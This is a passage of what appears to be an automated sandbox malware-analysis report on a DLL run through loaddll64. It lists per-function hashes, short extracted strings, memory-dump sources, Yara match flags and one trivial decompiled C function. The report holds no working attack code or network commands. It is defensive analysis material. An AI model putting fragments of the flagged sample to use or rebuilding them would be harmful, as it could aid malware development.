                                                                                                      • Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
                                                                                                      • Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
                                                                                                      • Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: , N$0gL
                                                                                                      • API String ID: 0-3996470819
                                                                                                      • Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                      • Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
                                                                                                      • Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                      • Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1/$G`OV
                                                                                                      • API String ID: 0-3929948944
                                                                                                      • Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                      • Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
                                                                                                      • Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                      • Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2V$W5
                                                                                                      • API String ID: 0-1873325321
                                                                                                      • Opcode ID: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                      • Instruction ID: 63ef17b550405aac1bd81048b7740241b15b08bd30737758e2ae9d54adb6feaa
                                                                                                      • Opcode Fuzzy Hash: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                      • Instruction Fuzzy Hash: 1741C3B190074A8BDB48DF24C4965DE7FB1FB68398F10421DFC5A9A290D3B8D6A4CBD4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ANSk$oB#x
                                                                                                      • API String ID: 0-2811520726
                                                                                                      • Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                      • Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
                                                                                                      • Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                      • Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (B$3
                                                                                                      • API String ID: 0-3108688774
                                                                                                      • Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                      • Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
                                                                                                      • Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                      • Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6`$\I
                                                                                                      • API String ID: 0-4113516648
                                                                                                      • Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                      • Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
                                                                                                      • Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                      • Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: KrTD$_D
                                                                                                      • API String ID: 0-934927992
                                                                                                      • Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                      • Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
                                                                                                      • Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                      • Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: A%9{$V
                                                                                                      • API String ID: 0-1820082490
                                                                                                      • Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                      • Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
                                                                                                      • Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                      • Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($>>
                                                                                                      • API String ID: 0-1145299130
                                                                                                      • Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                      • Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
                                                                                                      • Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                      • Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: bv$f
                                                                                                      • API String ID: 0-3039744445
                                                                                                      • Opcode ID: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                      • Instruction ID: 5cd7742688e295825d2d7ad71e75fb66b1b5906d5501222e705b32419eb79afe
                                                                                                      • Opcode Fuzzy Hash: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                      • Instruction Fuzzy Hash: 0E41B17091438A8FDB49CF68D84A5DE7FF0FB58348F104A29F86AA6250D3B4D664CF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *!#$mV5
                                                                                                      • API String ID: 0-2993575305
                                                                                                      • Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                      • Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
                                                                                                      • Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                      • Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `{$l^jf
                                                                                                      • API String ID: 0-1869605660
                                                                                                      • Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                      • Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
                                                                                                      • Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                      • Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2-$-
                                                                                                      • API String ID: 0-2034864362
                                                                                                      • Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                      • Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
                                                                                                      • Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                      • Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <&$q/
                                                                                                      • API String ID: 0-2233190826
                                                                                                      • Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                      • Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
                                                                                                      • Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                      • Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ?P>$g%
                                                                                                      • API String ID: 0-4203485977
                                                                                                      • Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                      • Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
                                                                                                      • Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                      • Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "X,h$Ts
                                                                                                      • API String ID: 0-4155455058
                                                                                                      • Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                      • Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
                                                                                                      • Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                      • Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Mbqz
                                                                                                      • API String ID: 0-2241695783
                                                                                                      • Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                      • Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
                                                                                                      • Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                      • Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C10C334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                      				signed long long _t25;
                                                                                                      				void* _t27;
                                                                                                      				void* _t30;
                                                                                                      
                                                                                                      				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                      				 *(_t30 + 0x10) = _t25;
                                                                                                      				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                      				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                      				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x7c10c362;
                                                                                                      				if (_t27 + __rdx -  !__r8 <= 0) goto 0x7c10c39e;
                                                                                                      				return __rdx + 0xb;
                                                                                                      			}






                                                                                                      0x7ff87c10c334
                                                                                                      0x7ff87c10c339
                                                                                                      0x7ff87c10c33e
                                                                                                      0x7ff87c10c362
                                                                                                      0x7ff87c10c369
                                                                                                      0x7ff87c10c37c
                                                                                                      0x7ff87c10c39d

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                      • Instruction ID: 3c1d53f21da012a9266d0fedf2f1eba87d554bc335017fe735e9933630784dd3
                                                                                                      • Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                      • Instruction Fuzzy Hash: 6751C323B2869185EB209B72E8506AA7BA0FB45BD4F144135EE6D67B95CE38D0C1CB10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: m1
                                                                                                      • API String ID: 0-128121454
                                                                                                      • Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                      • Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
                                                                                                      • Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                      • Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 7s
                                                                                                      • API String ID: 0-1359173241
                                                                                                      • Opcode ID: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                      • Instruction ID: c1bed52c3035b45a669a36fe4e02841f36ae4e7ddeb46aacfe2c23f9d3337973
                                                                                                      • Opcode Fuzzy Hash: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                      • Instruction Fuzzy Hash: 3B0267B5A0070DCFDB58CF28C59A59D3BA9FB49308F00412DFD0E9A2A4E7B4E915CB56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0% E
                                                                                                      • API String ID: 0-2094739979
                                                                                                      • Opcode ID: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                      • Instruction ID: 3cbd3403ae3a5eec6cd9fa22ed9c4212c86eadd61d9582ce71e19d9336bf90de
                                                                                                      • Opcode Fuzzy Hash: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                      • Instruction Fuzzy Hash: C8F108B1A0570CCFDBA8DFA8D58A6CDBBF1FF44344F104119E84AA7290D7B8951ACB49
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >
                                                                                                      • API String ID: 0-4048615937
                                                                                                      • Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                      • Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
                                                                                                      • Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                      • Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: w
                                                                                                      • API String ID: 0-4210951952
                                                                                                      • Opcode ID: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                      • Instruction ID: 98e286694507409f0343718d484b9c1230728cd38d8ca75ba1cdcc522b4ff82c
                                                                                                      • Opcode Fuzzy Hash: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                      • Instruction Fuzzy Hash: CCD1F27550670DCBEBA9CF28C58A6DE3BE5FF48304F104129FC1A862A1D7B4EA25CB45
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: k |P
                                                                                                      • API String ID: 0-500141808
                                                                                                      • Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
                                                                                                      • Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
                                                                                                      • Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
                                                                                                      • Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: {?
                                                                                                      • API String ID: 0-3906500937
                                                                                                      • Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                      • Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
                                                                                                      • Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                      • Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Rg
                                                                                                      • API String ID: 0-444783058
                                                                                                      • Opcode ID: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                      • Instruction ID: de0b65e82f7df1f72d442b51ab019ddee83380224b4c4f084cb2c80ee98f37ca
                                                                                                      • Opcode Fuzzy Hash: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                      • Instruction Fuzzy Hash: 9A91087150424D8BEF48CF68C88A6DE3FF0FB18398F255219E84AA6290D778D654CBD9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RC/
                                                                                                      • API String ID: 0-1672839029
